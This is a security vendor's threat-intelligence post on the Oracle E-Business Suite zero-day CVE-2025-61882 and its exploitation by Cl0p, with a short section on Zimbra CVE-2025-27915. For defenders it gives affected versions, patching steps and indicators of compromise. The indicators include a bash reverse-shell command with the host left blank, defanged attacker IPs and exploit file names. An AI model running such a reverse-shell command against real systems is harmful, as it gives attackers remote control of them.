Blog Trainings Request a Demo Login
Get Your Free Report
Start for Free
SOCRadar® Cyber Intelligence Inc. | CVE-2025-61882: Oracle E-Business Suite Exploited – What You Need to Know
Table Of Content
Related Articles
SOCRadar® Cyber Intelligence Inc. | Handala Claims It Disrupted Israeli Radar Systems: Here's What We Actually Know
Handala Claims It Disrupted Israeli Radar Systems: Here's What We Actually Know
Jun 08, 2026
SOCRadar® Cyber Intelligence Inc. | CVE-2026-20230: Cisco Unified CM WebDialer SSRF Can Lead to Root-Level Compromise
CVE-2026-20230: Cisco Unified CM WebDialer SSRF Can Lead to Root-Level Compromise
Jun 05, 2026
SOCRadar® Cyber Intelligence Inc. | HTTP/2 Bomb: How Default Configurations Open a New DoS Vector
HTTP/2 Bomb: How Default Configurations Open a New DoS Vector
Jun 04, 2026
SOCRadar® Cyber Intelligence Inc. | CVE-2025-48595: June 2026 Android Security Update Fixes Framework Zero-Day
CVE-2025-48595: June 2026 Android Security Update Fixes Framework Zero-Day
Jun 03, 2026
SOCRadar® Cyber Intelligence Inc. | Charter Data Breach: ShinyHunters Claims 42 Million Records Stolen on the Dark Web
Charter Data Breach: ShinyHunters Claims 42 Million Records Stolen on the Dark Web
May 29, 2026
Free Dark Web Report
Is your Domain/Email Exposed?
Oct 06, 2025
6 Mins Read
Apr 21, 2026
Moon

CVE-2025-61882: Oracle E-Business Suite Exploited – What You Need to Know

Recently, Oracle confirmed a critical zero-day vulnerability in Oracle E-Business Suite (EBS), tracked as CVE-2025-61882. The flaw, already exploited in the wild, has been used in data theft and extortion attacks attributed to the Cl0p ransomware gang. As Oracle rushed out an emergency fix, the situation revealed a wider ecosystem of threat actors and exploit leaks that organizations must urgently address.

What is CVE-2025-61882?

CVE-2025-61882 (CVSS 9.8) is a Remote Code Execution (RCE) vulnerability in the BI Publisher Integration component of Oracle’s Concurrent Processing module – an integral service within Oracle E-Business Suite that handles automated and background processes.

This flaw is remotely exploitable over HTTP without authentication, allowing an attacker to execute arbitrary code without valid credentials.

CVE-2025-61882 (SOCRadar Vulnerability Intelligence)

CVE-2025-61882 (SOCRadar Vulnerability Intelligence)

Which Oracle E-Business Suite (EBS) Versions are Affected By this Vulnerability?

CVE-2025-61882 affects Oracle EBS versions 12.2.3 through 12.2.14.

Why is this Considered a Zero-Day Vulnerability?

CVE-2025-61882 was actively exploited before the patch release, making it a zero-day. Oracle released an emergency advisory on October 4, 2025, detailing patch information and providing a set of Indicators of Compromise (IOCs) for immediate detection.

Who is Behind the Exploitation?

Investigations by Mandiant and the Google Threat Intelligence Group (GTIG) trace the exploitation to the Cl0p ransomware gang, known for mass data theft and extortion.

According to reports, the group has been sending ransom demands via compromised email accounts, claiming to have stolen sensitive data from Oracle EBS systems. The extortion campaign intensified between late September and early October 2025.

Cl0p’s extortion email (Source: Google Mandiant)

Cl0p’s extortion email (Source: Google Mandiant)

Interestingly, the exploit’s public leak didn’t come from Cl0p itself but from another threat actor collective calling itself Scattered Lapsus$ Hunters.” On October 3, 2025, this group leaked two files on Telegram – one allegedly containing Oracle-related source code and another archive.

How Severe is the Risk for Oracle EBS Customers?

The danger is high and immediate. The official Oracle advisory warns that CVE-2025-61882 can be exploited without authentication, enabling attackers to compromise exposed systems remotely with minimal effort.

The release of a public Proof-of-Concept (PoC) exploit has further increased the risk of widespread exploitation beyond Cl0p’s campaign. Security researchers warn that other threat actors could adopt the leaked exploit in opportunistic attacks.

SOCRadar’s Vulnerability Intelligence

SOCRadar’s Vulnerability Intelligence

With SOCRadar’s Vulnerability Intelligence, part of its Cyber Threat Intelligence (CTI) module, you can stay ahead of emerging threats by continuously tracking and prioritizing new CVEs that matter to your environment. Use it to identify which vulnerabilities are being weaponized, understand their exploit context, and take action before attackers do.

SOCRadar Dark Web Monitoring module

SOCRadar Dark Web Monitoring module

You can also leverage SOCRadar’s Dark Web Monitoring to keep an eye on hidden forums, Telegram channels, and leak sites for exploit dumps, PoC releases, and extortion chatter. This way, your team can catch early signs of exploit activity and respond before risks escalate.

What Indicators of Compromise (IOCs) Should Defenders Look For?

Oracle’s advisory lists several confirmed IOCs that defenders can use to detect and contain ongoing attacks:

IP addresses linked to exploitation:

  • 200[.]107[.]207[.]26
  • 185[.]181[.]60[.]11

Command observed:

  • sh -c /bin/bash -i >& /dev/tcp// 0>&1 (used to establish a reverse shell)

Exploit archive and related files:

  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Organizations should examine system logs, proxy traffic, and endpoint telemetry for these indicators and monitor for outbound connections to the listed IPs.

How Has Oracle Responded?

Oracle’s Chief Security Officer Rob Duhart announced the release of the Security Alert Advisory for CVE-2025-61882 and reaffirmed the urgency of patching. In a related Oracle Security blog post, he clarified that while vulnerabilities addressed in the July 2025 CPU were initially suspected, this new zero-day required an emergency fix.

Oracle also reiterated that the October 2023 CPU is a required prerequisite before installing the new patch. Furthermore, only EBS versions covered under Premier or Extended Support are eligible to receive the update. Older, unsupported versions may also be vulnerable but will not receive patches.

What Should Organizations Do Now?

Oracle strongly recommends that customers patch immediately and verify they are not already compromised. Key defensive steps include:

  • Install updates – Ensure the October 2023 CPU is installed before applying the emergency CVE-2025-61882 patch.
  • Check support coverage – Confirm your Oracle EBS deployment is under Premier or Extended Support; plan upgrades if not.
  • Investigate for compromise – Review logs, run endpoint scans, and check for the IOCs Oracle published.
  • Restrict exposure – Limit internet access to Oracle EBS servers and segregate them from core networks.
  • Hunt retroactively – Examine activity dating back to August 2025, as exploitation predated the fix.
  • Be alert for extortion emails – Treat unsolicited data-theft threats with suspicion and coordinate with internal legal and incident response teams.
  • Monitor for PoC use – With a public exploit now circulating, continuous monitoring is critical to detect new attempts.

For the full patch documentation, IOC references, and official instructions, consult Oracle’s Security Alert Advisory and the Patch Availability Document.

Another Zero-Day in the Spotlight: CVE-2025-27915 in Zimbra Collaboration Suite

Researchers also identified another zero-day earlier this year targeting Zimbra Collaboration Suite (ZCS). The flaw, CVE-2025-27915, is a cross-site scripting (XSS) vulnerability in ZCS 9.0, 10.0, and 10.1, arising from unsanitized HTML in .ICS calendar files.

How Was CVE-2025-27915 Exploited?

The campaign used phishing emails impersonating the Libyan Navy’s Office of Protocol to target a Brazilian military organization. Attackers embedded malicious JavaScript in calendar invitations, stealing credentials, emails, and contacts when users opened them.

StrikeReady traced the attacks back to January 2025, predating Zimbra’s fix on January 27 (ZCS 9.0.0 P44, 10.0.13, and 10.1.5). In parallel, attribution remains unclear, but researchers noted overlaps with UNC1151, a group tied to the Belarusian government.

For further information, see the research blog and Zimbra’s official advisory.